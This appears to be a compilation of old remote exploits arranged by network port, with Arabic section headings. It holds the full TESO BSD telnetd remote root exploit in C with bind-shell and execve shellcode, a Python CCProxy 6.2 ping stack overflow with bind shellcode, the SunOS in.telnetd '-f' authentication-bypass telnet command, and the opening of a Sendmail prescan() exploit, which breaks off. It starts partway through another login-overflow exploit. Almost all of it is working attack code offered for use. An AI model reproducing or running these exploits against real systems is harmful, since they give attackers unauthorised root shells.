str_buffer_pos += sizeof(realfree_edx);
strcpy(str_buffer + str_buffer_pos,login_buffer1);
str_buffer_pos += strlen(login_buffer1);
memcpy(str_buffer + str_buffer_pos,t_delete_edi_plus_0x8,sizeof(t_dele te_edi_plus_0x8));
str_buffer_pos += sizeof(t_delete_edi_plus_0x8);
memcpy(str_buffer + str_buffer_pos,t_delete_edi_plus_0xa,strlen(t_dele te_edi_plus_0xa));
str_buffer_pos += strlen(t_delete_edi_plus_0xa);
memcpy(str_buffer + str_buffer_pos,t_delete_edi_plus_0x10,sizeof(t_del ete_edi_plus_0x10));
str_buffer_pos += sizeof(t_delete_edi_plus_0x10);
strcpy(str_buffer + str_buffer_pos,login_buffer1_0);
str_buffer_pos += strlen(login_buffer1_0);
memcpy(str_buffer + str_buffer_pos,t_delete_edi_plus_0x20,sizeof(t_del ete_edi_plus_0x20));
str_buffer_pos += sizeof(t_delete_edi_plus_0x20);
strcpy(str_buffer + str_buffer_pos,login_buffer1_1);
str_buffer_pos += strlen(login_buffer1_1);
memcpy(str_buffer + str_buffer_pos,t_delete2_param1,sizeof(t_delete2_p aram1));
str_buffer_pos += sizeof(t_delete2_param1);
strcpy(str_buffer + str_buffer_pos,login_buffer1_2);
str_buffer_pos += strlen(login_buffer1_2);
memcpy(str_buffer + str_buffer_pos,link_pos,sizeof(link_pos));
str_buffer_pos += sizeof(link_pos);
strcpy(str_buffer + str_buffer_pos,login_buffer2);
str_buffer_pos += strlen(login_buffer2);
memcpy(str_buffer + str_buffer_pos,t_delete2_edi_plus_0x8,sizeof(t_del ete2_edi_plus_0x8));
str_buffer_pos += sizeof(t_delete2_edi_plus_0x8);
strcpy(str_buffer + str_buffer_pos,login_buffer2_0);
str_buffer_pos += strlen(login_buffer2_0);
memcpy(str_buffer + str_buffer_pos,t_delete2_edi_plus_0x10,sizeof(t_de lete2_edi_plus_0x10));
str_buffer_pos += sizeof(t_delete2_edi_plus_0x10);
strcpy(str_buffer + str_buffer_pos,login_buffer2_1);
str_buffer_pos += strlen(login_buffer2_1);
memcpy(str_buffer + str_buffer_pos,t_delete2_edi_plus_0x20,sizeof(t_de lete2_edi_plus_0x20));
str_buffer_pos += sizeof(t_delete2_edi_plus_0x20);
strcpy(str_buffer + str_buffer_pos,login_buffer2_2);
str_buffer_pos += strlen(login_buffer2_2);
memcpy(str_buffer + str_buffer_pos,strncpy_src,sizeof(strncpy_src));
str_buffer_pos += sizeof(strncpy_src);
memcpy(str_buffer + str_buffer_pos,env_buffer,strlen(env_buffer));
str_buffer_pos += strlen(env_buffer);
memcpy(str_buffer + str_buffer_pos,pam_input_output_eax,sizeof(pam_inp ut_output_eax));
str_buffer_pos += sizeof(pam_input_output_eax);
memcpy(str_buffer + str_buffer_pos,env_buffer,strlen(env_buffer0));
str_buffer_pos += strlen(env_buffer0);
memcpy(str_buffer + str_buffer_pos,free_dest_buffer,sizeof(free_dest_b uffer));
str_buffer_pos += sizeof(free_dest_buffer);
memcpy(str_buffer + str_buffer_pos,env_buffer2,strlen(env_buffer2));
str_buffer_pos += strlen(env_buffer2);
memcpy(str_buffer + str_buffer_pos,free_dest_buffer2,sizeof(free_dest_ buffer2));
str_buffer_pos += sizeof(free_dest_buffer2);
strcpy(str_buffer + str_buffer_pos,exp_buffer0);
str_buffer_pos += strlen(exp_buffer0);
memcpy(str_buffer + str_buffer_pos,jmp_code,sizeof(jmp_code));
str_buffer_pos += sizeof(jmp_code);
strcpy(str_buffer + str_buffer_pos,exp_buffer1);
str_buffer_pos += strlen(exp_buffer1);
memcpy(str_buffer + str_buffer_pos,shellcode,sizeof(shellcode));
str_buffer_pos += sizeof(shellcode);
strcpy(str_buffer + str_buffer_pos,exec_argv0);
str_buffer_pos += strlen(exec_argv0)+1;
strcpy(str_buffer + str_buffer_pos,exec_argv1);
str_buffer_pos += strlen(exec_argv1)+1;
strcpy(str_buffer + str_buffer_pos,exec_argv2);
str_buffer_pos += strlen(exec_argv2)+1;
strcpy(str_buffer + str_buffer_pos,exec_argv3);
str_buffer_pos += strlen(exec_argv3)+1;
memcpy(str_buffer + str_buffer_pos,str_end,strlen(str_end));
str_buffer_pos += strlen(str_end);
{
char buf[100];
fgets(buf,100,stdin);
}
printf("sending login!\n");
fflush(stdout);
send_data(sock,str_buffer,str_buffer_pos);
send_data(sock,NULL,0);
printf("\n\n\npress return to send password\n...");
{
char buf[100];
fgets(buf,100,stdin);
}
send_data(sock,str_buffer,strlen(str_buffer)+1);
printf("\n\n\nwaiting for the realfree & t_delete to be called!\n...\n\n");
fflush(stdout);
sleep(30);
return 42;
}
// [2001-12-20]
23 BSD (telnetd) Remote Root Exploit
/* 7350854 - x86/bsd telnetd remote root exploit
*
* TESO CONFIDENTIAL - SOURCE MATERIALS
*
* This is unpublished proprietary source code of TESO Security.
*
* The contents of these coded instructions, statements and computer
* programs may not be disclosed to third parties, copied or duplicated in
* any form, in whole or in part, without the prior written permission of
* TESO Security. This includes especially the Bugtraq mailing list, the
* www.hack.co.za website and any public exploit archive.
*
* (C) COPYRIGHT TESO Security, 2001
* All Rights Reserved
*
************************************************** ***************************
* bug found by scut 2001/06/09
* further research by smiler, zip, lorian and me.
* thanks to zip's cool friend for giving me a testbed to play on
*
* tested against: BSDI BSD/OS 4.1
* NetBSD 1.5
* FreeBSD 3.1
* FreeBSD 4.0-REL
* FreeBSD 4.2-REL
* FreeBSD 4.3-BETA
* FreeBSD 4.3-STABLE
* FreeBSD 4.3-RELEASE
*
*/
#define VERSION "0.0.7"
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <arpa/telnet.h>
#include <netdb.h>
#include <errno.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
/* global variables, uhhohh!
*/
int mode = 16;
int num = 245;
int pop = 31500; /* puts code at 0x08fdff0a */
int bs = 1; /* buffer start */
int num34 = 244;
int pop34 = 71833; /* puts code at 0x0a0d08fe */
int bs34 = 0;
int walk; /* populator walker */
int force = 0; /* force exploitation */
int checkonly = 0; /* check telnetd only */
void usage (char *progname);
int xp_check (int fd);
void xp_pop (int fd);
void xp_shrinkwin (int fd);
void xp_setenv (int fd, unsigned char *var, unsigned char *val);
void xp (int fd);
void shell (int sock);
void hexdump (char *desc, unsigned char *data, unsigned int amount);
/* imported from shellkit */
unsigned long int random_get (unsigned long int low, unsigned long int high);
void random_init (void);
int bad (unsigned char u);
int badstr (unsigned char *code, int code_len, unsigned char *bad,
int bad_len);
unsigned long int x86_nop_rwreg (void);
unsigned long int x86_nop_xfer (char *xferstr);
unsigned int x86_nop (unsigned char *dest, unsigned int dest_len,
unsigned char *bad, int bad_len);
#define BSET(dest, len, val, bw) { \
dest &= ~(((unsigned char) ~0) >> bw); /* clear lower bits */ \
dest |= val << (8 - bw - len); /* set value bits */ \
bw += len; \
}
/* imported from network.c */
#define NET_CONNTIMEOUT 60
int net_conntimeout = NET_CONNTIMEOUT;
unsigned long int net_resolve (char *host);
int net_connect (struct sockaddr_in *cs, char *server,
unsigned short int port, int sec);
/* x86/bsd PIC portshell shellcode
* by lorian/teso
* port 0x4444 (might want to change it here)
*/
unsigned char x86_bsd_portshell[] =
"\x31\xdb\xf7\xe3\x53\x43\x53\x43\x53\xb0\x61\x53"
"\xcd\x80\x96\x52\x66\x68\x44\x44\x66\x53\x89\xe5"
/* ^^ ^^ port */
"\x6a\x10\x55\x56\x56\x6a\x68\x58\xcd\x80\xb0\x6a"
"\xcd\x80\x60\xb0\x1e\xcd\x80\x53\x50\x50\xb0\x5a"
"\xcd\x80\x4b\x79\xf6\x52\x89\xe3\x68\x6e\x2f\x73"
"\x68\x68\x2f\x2f\x62\x69\x60\x5e\x5e\xb0\x3b\xcd"
"\x80";
/* x86/bsd PIC execve shellcode
* by lorian/teso
*/
unsigned char x86_bsd_execvesh[] =
"\x6a\x3b\x58\x99\x52\x89\xe3\x68\x6e\x2f\x73\x68"
"\x68\x2f\x2f\x62\x69\x60\x5e\x5e\xcd\x80";
/* x86/bsd(i)+solaris execve shellcode
* by lorian/teso
*/
unsigned char x86_bsd_compaexec[] =
"\xbf\xee\xee\xee\x08\xb8\xff\xf8\xff\x3c\xf7\xd0"
"\xfd\xab\x31\xc0\x99\xb0\x9a\xab\xfc\xab\xb0\x3b"
"\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89"
"\xe3\x52\x53\x89\xe1\x52\x51\x53\xff\xd7";
unsigned char * shellcode = x86_bsd_compaexec;
#define COL 55
void
usage (char *progname)
{
fprintf (stderr, "usage: %s [-n <num>] [-c] [-f] <ip>\n\n", progname);
fprintf (stderr, "-n num\tnumber of populators, for testing purposes\n"
"-c\tcheck exploitability only, do not exploit\n"
"-f\tforce mode, override check results\n\n");
fprintf (stderr, "WARNING: this is no easy exploit, we have to get things tightly aligned and\n"
"send 16/34mb of traffic to the remote telnet daemon. it might not be able to\n"
"take that, or it will take very long for it (> 1h). beware.\n\n");
fprintf (stderr, "tested:\tFreeBSD 3.1, 4.0-REL, 4.2-REL, 4.3-BETA, 4.3-STABLE, 4.3-RELEASE \n"
"\tNetBSD 1.5\n"
"\tBSDI BSD/OS 4.1\n\n");
exit (EXIT_FAILURE);
}
int
main (int argc, char *argv[])
{
char c;
char * progname;
char * dest;
int i, j, fd,
dots = 0;
int popc;
struct timeval start,
cur;
unsigned long long int g_pct, /* gaussian percentage */
g_all; /* gaussian overall */
fprintf (stderr, "7350854 - x86/bsd telnetd remote root\n"
"by zip, lorian, smiler and scut.\n\n");
progname = argv[0];
if (argc < 2)
usage (progname);
while ((c = getopt (argc, argv, "n:cf")) != EOF) {
switch (c) {
case 'n':
num = atoi (optarg);
break;
case 'c':
checkonly = 1;
break;
case 'f':
force = 1;
break;
default:
usage (progname);
break;
}
}
dest = argv[argc - 1];
if (dest[0] == '-')
usage (progname);
fd = net_connect (NULL, dest, 23, 20);
if (fd <= 0) {
fprintf (stderr, "failed to connect\n");
exit (EXIT_FAILURE);
}
random_init ();
if (xp_check (fd) == 0 && force == 0) {
printf ("aborting\n");
#ifndef DEBUG
exit (EXIT_FAILURE);
#endif
}
close (fd);
if (checkonly)
exit (EXIT_SUCCESS);
fd = net_connect (NULL, dest, 23, 20);
if (fd <= 0) {
fprintf (stderr, "failed to connect the second time\n");
exit (EXIT_FAILURE);
}
printf ("\n################################################ #############################\n\n");
printf ("ok baby, times are rough, we send %dmb traffic to the remote\n"
"telnet daemon process, it will spill badly. but then, there is no\n"
"other way, sorry...\n\n", mode);
#ifdef DEBUG
getchar ();
#endif
printf ("## setting populators to populate heap address space\n");
g_all = ((unsigned long long int)(pop / 2)) *
((unsigned long long int)(pop + 1));
g_pct = 0;
printf ("## number of setenvs (dots / network): %d\n", pop);
printf ("## number of walks (percentage / cpu): %Lu\n", g_all);
printf ("##\n");
printf ("## the percentage is more realistic than the dots ;)\n");
printf ("\n");
printf ("percent |");
popc = pop / COL;
for (i = pop / popc ; i >= 0 ; --i)
printf ("-");
printf ("| ETA |\n");
gettimeofday (&start, NULL);
for (walk = 0 ; walk < pop ; ++walk) {
xp_pop (fd);
g_pct += walk;
if (walk % popc == 0)
dots += 1;
if (walk % 200 == 0) {
int pct;
float pct_f;
unsigned long int diff;
pct = (int) ((g_pct * 100) / g_all);
pct_f = g_pct * 100;
pct_f /= (float) g_all;
/* calculate difference not caring about accuracy */
gettimeofday (&cur, NULL);
diff = cur.tv_sec - start.tv_sec;
printf ((pct == 100) ? "\r%3.2f%% |" : ((pct / 10) ?
"\r %2.2f%% |" : "\r %1.2f%% |"), pct_f);
for (j = 0 ; j < dots ; ++j)
printf (".");
for ( ; j <= COL ; ++j)
printf (" ");
if (pct != 0) {
diff = (int) ((((float)(100 - pct_f)) /
(float) pct_f) * diff);
printf ("| %02lu:%02lu:%02lu |",
diff / 3600, (diff % 3600) / 60,
diff % 60);
} else {
printf ("| --:--:-- |");
}
fflush (stdout);
}
}
printf ("\n\n");
printf ("## sleeping for 10 seconds to let the process recover\n");
sleep (10);
#ifdef DEBUG
getchar ();
#endif
/* return into 0x08feff0a */
xp (fd);
sleep (1);
printf ("## ok, you should now have a root shell\n");
printf ("## as always, after hard times, there is a reward...\n");
printf ("\n\ncommand: ");
fflush (stdout);
shell (fd);
exit (EXIT_SUCCESS);
}
void
xp (int fd)
{
int n;
unsigned char buf[2048];
/* basic overflow */
for (n = bs ; n < sizeof (buf) ; ++n)
buf[n] = (n - bs) % 2 ? '\xf6' : '\xff';
/* some nifty alignment */
buf[0] = '\xff'; /* IAC */
buf[1] = '\xf5'; /* AO */
if (mode == 16) {
buf[2] = '\xff'; /* IAC */
buf[3] = '\xfb'; /* WILL */
buf[4] = '\x26'; /* ENCRYPTION */
}
/* force 0x08feff0a as return */
buf[num++] = '\xff';
buf[num++] = '\xfb';
buf[num++] = '\x08';
/* and the output_encrypt overwrite action, yay! */
buf[num++] = '\xff';
buf[num++] = '\xf6';
/* XXX: should not fail here, though we should better loop and check */
n = send (fd, buf, num, 0);
if (n != num) {
perror ("xp:send");
}
}
#ifdef INSANE_MIND
void
xp_shrinkwin (int fd)
{
int n;
int iobc;
int p = 0;
unsigned char buf[2048];
char c;
int val;
int len;
for (n = 0 ; n < sizeof (buf) ; ++n)
buf[n] = n % 2 ? '\xf6' : '\xff';
len = sizeof (val);
getsockopt (fd, SOL_SOCKET, SO_SNDLOWAT, &val, &len);
printf ("SO_SNDLOWAT = %d\n", val);
val = 1;
printf ("setsockopt: %s\n",
setsockopt (fd, SOL_SOCKET, SO_SNDLOWAT, &val, sizeof(val)) ?
"FAILED" : "SUCCESS");
val = 1234;
getsockopt (fd, SOL_SOCKET, SO_SNDLOWAT, &val, &len);
printf ("SO_SNDLOWAT = %d\n", val);
getchar();
while (1) {
if (p > 105)
c = getchar();
if (c == 'r') {
getchar();
read (fd, &buf[1024], 384);
} else if (c == 'o') {
getchar();
send (fd, "7", 1, MSG_OOB);
} else if (c != 'r') {
usleep(100000);
n = send (fd, buf, 112, 0);
ioctl (fd, FIONREAD, &iobc);
len = sizeof (val);
getsockopt (fd, SOL_SOCKET, SO_RCVBUF, &val, &len);
printf ("%02d. send: %d local: %d/%d (%d left)\n",
++p, n, iobc, val, val - iobc);
}
}
}
#endif
/* xp_pop - populator function
*
* causes remote telnet daemon to setenv() variables with our content, populating
* the heap with shellcode. this will get us more nopspace and place our shellcode
* where the nice addresses are, that we can create by writing telnet option
* strings.
*
* XXX: there seems to be a maximum size for the environment value you can set,
* which is 510. we use 496 bytes for nopspace and shellcode therefore.
* should work, rather similar to tsig tcp/malloc exploitation. -sc
*/
void
xp_pop (int fd)
{
unsigned char var[16];
unsigned char storebuf[496];
sprintf (var, "%06x", walk);
#ifdef DEBUG
memset (storebuf, '\xcc', sizeof (storebuf));
#else
/* memset (storebuf, '\x90', sizeof (storebuf)); */
x86_nop (storebuf, sizeof (storebuf), "\x00\x01\x02\x03\xff", 5);
memcpy (storebuf + sizeof (storebuf) - strlen (shellcode) - 1,
shellcode, strlen (shellcode));
#endif
storebuf[sizeof (storebuf) - 1] = '\0';
xp_setenv (fd, var, storebuf);
}
void
xp_setenv (int fd, unsigned char *var, unsigned char *val)
{
int n = 0;
unsigned char buf[2048];
buf[n++] = IAC;
buf[n++] = SB;
buf[n++] = TELOPT_NEW_ENVIRON;
buf[n++] = TELQUAL_IS;
buf[n++] = ENV_USERVAR;
/* should not contain < 0x04 */
while (*var) {
if (*var == IAC)
buf[n++] = *var;
buf[n++] = *var++;
}
buf[n++] = NEW_ENV_VALUE;
while (*val) {
if (*val == IAC)
buf[n++] = *val;
buf[n++] = *val++;
}
buf[n++] = IAC;
buf[n++] = SE;
if (send (fd, buf, n, 0) != n) {
perror ("xp_setenv:send");
exit (EXIT_FAILURE);
}
}
int
xp_check (int fd)
{
int n;
unsigned int expect_len = 15;
unsigned char expected[] =
"\x0d\x0a\x5b\x59\x65\x73\x5d\x0d\x0a\xff\xfe\x08\x ff\xfd\x26";
/* \r \n [ Y e s ] \r \n IAC DONT 08 IAC DO 26*/
unsigned int additional_len = 8;
unsigned char additional[] =
"\xff\xfa\x26\x01\x01\x02\xff\xf0";
/*IAC SB ENC ........... IAC SE */
unsigned char buf[128];
read (fd, buf, sizeof (buf));
n = 0;
buf[n++] = IAC; /* 0xff */
buf[n++] = AYT; /* 0xf6 */
buf[n++] = IAC; /* 0xff */
buf[n++] = WILL; /* 0xfb */
buf[n++] = TELOPT_NAOL; /* 0x08 */
buf[n++] = IAC; /* 0xff */
buf[n++] = WILL; /* 0xfb */
buf[n++] = TELOPT_ENCRYPT; /* 0x26 */
#ifdef DEBUG
hexdump ("check send buffer", buf, n);
#endif
if (send (fd, buf, n, 0) != n) {
perror ("xp_check:send");
exit (EXIT_FAILURE);
}
n = read (fd, buf, sizeof (buf));
#ifdef DEBUG
hexdump ("check recv buffer", buf, n);
#endif
if (memcmp (buf, expected, expect_len) == 0) {
if (memcmp (buf+expect_len, additional, additional_len) == 0) {
mode = 16;
} else {
mode = 34;
bs = bs34;
}
printf ("check: PASSED, using %dmb mode\n", mode);
return (1);
}
printf ("check: FAILED\n");
return (0);
}
void
shell (int sock)
{
int l;
char buf[512];
fd_set rfds;
while (1) {
FD_SET (0, &rfds);
FD_SET (sock, &rfds);
select (sock + 1, &rfds, NULL, NULL, NULL);
if (FD_ISSET (0, &rfds)) {
l = read (0, buf, sizeof (buf));
if (l <= 0) {
perror ("read user");
exit (EXIT_FAILURE);
}
write (sock, buf, l);
}
if (FD_ISSET (sock, &rfds)) {
l = read (sock, buf, sizeof (buf));
if (l <= 0) {
perror ("read remote");
exit (EXIT_FAILURE);
}
write (1, buf, l);
}
}
}
/* ripped from zodiac */
void
hexdump (char *desc, unsigned char *data, unsigned int amount)
{
unsigned int dp, p; /* data pointer */
const char trans[] =
"................................ !\"#$%&'()*+,-./0123456789"
":;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklm"
"nopqrstuvwxyz{|}~................................. ..."
".................................................. ..."
"........................................";
printf ("/* %s, %u bytes */\n", desc, amount);
for (dp = 1; dp <= amount; dp++) {
fprintf (stderr, "%02x ", data[dp-1]);
if ((dp % 8) == 0)
fprintf (stderr, " ");
if ((dp % 16) == 0) {
fprintf (stderr, "| ");
p = dp;
for (dp -= 16; dp < p; dp++)
fprintf (stderr, "%c", trans[data[dp]]);
fflush (stderr);
fprintf (stderr, "\n");
}
fflush (stderr);
}
if ((amount % 16) != 0) {
p = dp = 16 - (amount % 16);
for (dp = p; dp > 0; dp--) {
fprintf (stderr, " ");
if (((dp % 8) == 0) && (p != 8))
fprintf (stderr, " ");
fflush (stderr);
}
fprintf (stderr, " | ");
for (dp = (amount - (16 - p)); dp < amount; dp++)
fprintf (stderr, "%c", trans[data[dp]]);
fflush (stderr);
}
fprintf (stderr, "\n");
return;
}
unsigned long int
net_resolve (char *host)
{
long i;
struct hostent *he;
i = inet_addr(host);
if (i == -1) {
he = gethostbyname(host);
if (he == NULL) {
return (0);
} else {
return (*(unsigned long *) he->h_addr);
}
}
return (i);
}
int
net_connect (struct sockaddr_in *cs, char *server,
unsigned short int port, int sec)
{
int n,
len,
error,
flags;
int fd;
struct timeval tv;
fd_set rset, wset;
struct sockaddr_in csa;
if (cs == NULL)
cs = &csa;
/* first allocate a socket */
cs->sin_family = AF_INET;
cs->sin_port = htons (port);
fd = socket (cs->sin_family, SOCK_STREAM, 0);
if (fd == -1)
return (-1);
if (!(cs->sin_addr.s_addr = net_resolve (server))) {
close (fd);
return (-1);
}
flags = fcntl (fd, F_GETFL, 0);
if (flags == -1) {
close (fd);
return (-1);
}
n = fcntl (fd, F_SETFL, flags | O_NONBLOCK);
if (n == -1) {
close (fd);
return (-1);
}
error = 0;
n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));
if (n < 0) {
if (errno != EINPROGRESS) {
close (fd);
return (-1);
}
}
if (n == 0)
goto done;
FD_ZERO(&rset);
FD_ZERO(&wset);
FD_SET(fd, &rset);
FD_SET(fd, &wset);
tv.tv_sec = sec;
tv.tv_usec = 0;
n = select(fd + 1, &rset, &wset, NULL, &tv);
if (n == 0) {
close(fd);
errno = ETIMEDOUT;
return (-1);
}
if (n == -1)
return (-1);
if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) {
if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) {
len = sizeof(error);
if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) {
errno = ETIMEDOUT;
return (-1);
}
if (error == 0) {
goto done;
} else {
errno = error;
return (-1);
}
}
} else
return (-1);
done:
n = fcntl(fd, F_SETFL, flags);
if (n == -1)
return (-1);
return (fd);
}
/* imported from shellkit */
unsigned long int
random_get (unsigned long int low, unsigned long int high)
{
unsigned long int val;
if (low > high) {
low ^= high;
high ^= low;
low ^= high;
}
val = (unsigned long int) random ();
val %= (high - low);
val += low;
return (val);
}
void
random_init (void)
{
srandom (time (NULL));
}
int
bad (unsigned char u)
{
if (u == '\x00' || u == '\x0a' || u == '\x0d' || u == '\x25')
return (1);
return (0);
}
int
badstr (unsigned char *code, int code_len, unsigned char *bad, int bad_len)
{
int n;
for (code_len -= 1 ; code_len >= 0 ; --code_len) {
for (n = 0 ; n < bad_len ; ++n)
if (code[code_len] == bad[n])
return (1);
}
return (0);
}
unsigned long int
x86_nop_rwreg (void)
{
unsigned long int reg;
do {
reg = random_get (0, 7);
} while (reg == 4); /* 4 = $esp */
return (reg);
}
unsigned long int
x86_nop_xfer (char *xferstr)
{
int bw = 0; /* bitfield walker */
unsigned char tgt; /* resulting instruction */
/* in a valid xferstr we trust */
for (tgt = 0 ; xferstr != NULL && xferstr[0] != '\0' ; ++xferstr) {
switch (xferstr[0]) {
case ('0'):
BSET (tgt, 1, 0, bw);
break;
case ('1'):
BSET (tgt, 1, 1, bw);
break;
case ('r'):
BSET (tgt, 3, x86_nop_rwreg (), bw);
break;
case ('.'):
break; /* ignore */
default:
fprintf (stderr, "on steroids, huh?\n");
exit (EXIT_FAILURE);
break;
}
}
if (bw != 8) {
fprintf (stderr, "invalid bitwalker: bw = %d\n", bw);
exit (EXIT_FAILURE);
}
return (tgt);
}
unsigned int
x86_nop (unsigned char *dest, unsigned int dest_len,
unsigned char *bad, int bad_len)
{
int walk;
int bcount; /* bad counter */
char * xs;
char * xferstr[] = {
"0011.0111", /* aaa */
"0011.1111", /* aas */
"1001.1000", /* cbw */
"1001.1001", /* cdq */
"1111.1000", /* clc */
"1111.1100", /* cld */
"1111.0101", /* cmc */
"0010.0111", /* daa */
"0010.1111", /* das */
"0100.1r", /* dec <reg> */
"0100.0r", /* inc <reg> */
"1001.1111", /* lahf */
"1001.0000", /* nop */
"1111.1001", /* stc */
"1111.1101", /* std */
"1001.0r", /* xchg al, <reg> */
NULL,
};
unsigned char tgt;
for (walk = 0 ; dest_len > 0 ; dest_len -= 1 , walk += 1) {
/* avoid endless loops on excessive badlisting */
for (bcount = 0 ; bcount < 16384 ; ++bcount) {
xs = xferstr[random_get (0, 15)];
tgt = x86_nop_xfer (xs);
dest[walk] = tgt;
if (badstr (&dest[walk], 1, bad, bad_len) == 0)
break;
}
/* should not happen */
if (bcount >= 16384) {
fprintf (stderr, "too much blacklisting, giving up...\n");
exit (EXIT_FAILURE);
}
}
return (walk);
}
// [2001-06-09]
23 CCProxy 6.2 (ping) Remote Buffer Overflow Exploit
################################################## ####################
## |------------------------------------------------------------| ##
## | CCProxy 6.2 ping Remote Buffer Overflow Exploit | ##
## | Based on Ruder's discovery,exploit by KaGra | ##
## | Binds Shellcode aT 101,use netcat to connect back... | ##
## | Tested in WinXP SP1 EnGlish | ##
## | Greedingz to:NinA,Coderz.gr and my musik BanD | ##
## |------------------------------------------------------------| ##
################################################## ####################
# Usage:exploit.py|nc Host port,where port is the telnet service of the target
# The buG exists when a long parameter is passed to ping command in telnet
# service of CCproxy server.This is a classic stack based overflow.Ret address
# is close to ESI,so a JMP ESI will do the trick.Other nops are just for padding...
#
#
#C:\exploit.py|nc localhost 23
#
#C:\nc -v localhost 101
#
#Microsoft Windows XP [Version 5.1.2600]
#(C) Copyright 1985-2001 Microsoft Corp.
#
#C:\Documents and Settings\xcv>
import struct
#BinD ShellCode aT PorT 101,taken from muts exploit,thankz pul...
sc2 = "\xEB"
sc2 += "\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x 75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
sc2 += "\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\x AC\x90\x03\xCD\xB4\x03\xDC\x8D"
sc2 += "\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\x BA\xC1\x03\xBC\x03\x89\x66\xB9"
sc2 += "\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x 89\x4F\x63\x7A\xB3\xF4\xAC\x9C"
sc2 += "\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\x D2\x94\x89\x63\x03\x8C\x03\x89"
sc2 += "\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\x D6\xE2\xB8\xD1\xEC\x03\x91\x03"
sc2 += "\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x 06\xC6\x86\x64\x77\x5E\x01\x4F"
sc2 += "\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\x AF\x88\x88\x88\x18\x89\x88\x88"
sc2 += "\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x 2C\x92\xF8\x4F\x2C\x25\xA6\x61"
sc2 += "\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\x BB\xBA\x88\xD3\x05\xC3\xA8\xD9"
sc2 += "\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\x D9\xDB\x77\xBC\x07\x77\xDD\x8C"
sc2 += "\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\x DD\xB8\xB9\x48\xD8\xD8\xD8\xD8"
sc2 += "\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\x DB\xE0\x8A\x88\x88\xED\x01\x68"
sc2 += "\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\x DB\xDC\xDF\x77\xDD\xA8\x01\x4F"
sc2 += "\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\x F4\xAC\x24\xE2\x9D\xD1\x7B\x23"
sc2 += "\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\x CC\xEE\x4F\xCC\xAC\xB4\x89\x89"
sc2 += "\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x 05\xCC\xAC\x98\xDC\xD8\xD9\xD9"
sc2 += "\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\x FA\x76\x3B\x9E\x77\xDD\x8C\x77"
sc2 += "\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\x DD\x8C\x01\x4B\xE0\x77\x77\x77"
sc2 += "\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\x FB\x77\xDD\x8C\xB9\x53\xDB\x77"
sc2 += "\x58\x68\x61\x63\x6B\x90"
buffer = '\x90'*605 # The usual nops...
RETADDR="\xc7\x41\xe6\x77" # JMP ESI In XP SP1 EnGliSH...
buff2='\x90'*8 # padding...
print "ping "+buffer+sc2+RETADDR+buff2 # DeaD...
// [2004-11-10]
23 SunOS 5.10/5.11 in.telnetd Remote Authentication Bypass Exploit
#!/bin/sh
# CLASSIFIED CONFIDENTIAL SOURCE MATERIAL
#
# *********************ATTENTION******************** ************
# THIS CODE _MUST NOT_ BE DISCLOSED TO ANY THIRD PARTIES
# (C) COPYRIGHT Kingcope, 2007
#
################################################## ##############
echo ""
echo "SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope [email protected]"
if [ $# -ne 2 ]; then
echo "./sunos <host> <account>"
echo "./sunos localhost bin"
exit
fi
echo ""
echo "ALEX ALEX"
echo ""
telnet -l"-f$2" $1
# [2007-02-11]
####################################
انتهينا من البورت 23
###################################
نبداء بـ بورت 25
25 Sendmail <= 8.12.8 prescan() BSD Remote Root Exploit
/*
* Sendmail 8.12.8 prescan() PROOF OF CONCEPT exploit by bysin
*
* This is to prove that the bug in sendmail 8.12.8 and below is vulnerable.
* On sucessful POC exploitation the program should crash with the following:
*
* Program received signal SIGSEGV, Segmentation fault.
* 0x5c5c5c5c in ?? ()
*
*/
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <unistd.h>
#include <netdb.h>
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
int maxarch=1;
struct arch {
char *os; // The OS
int pos; // The position of ebp in the stack, with the last byte being 0x00
int apos; // The amount of bytes after pvpbuf where ebp is located
unsigned long addr; // The pointer to the addr buffer
} archs[] = {
{"FreeBSD 4.7-RELEASE",180,28,0xbfbfdad1},
};
/////////////////////////////////////////////////////////
#define BUFSIZE 50096
void header() {
printf("Sendmail 8.12.8 prescan() exploit by bysin\n\n");
}
void printtargets() {
unsigned long i;
header();
printf("\t Target\t Addr\t\t OS\n");
printf("\t-------------------------------------------\n");
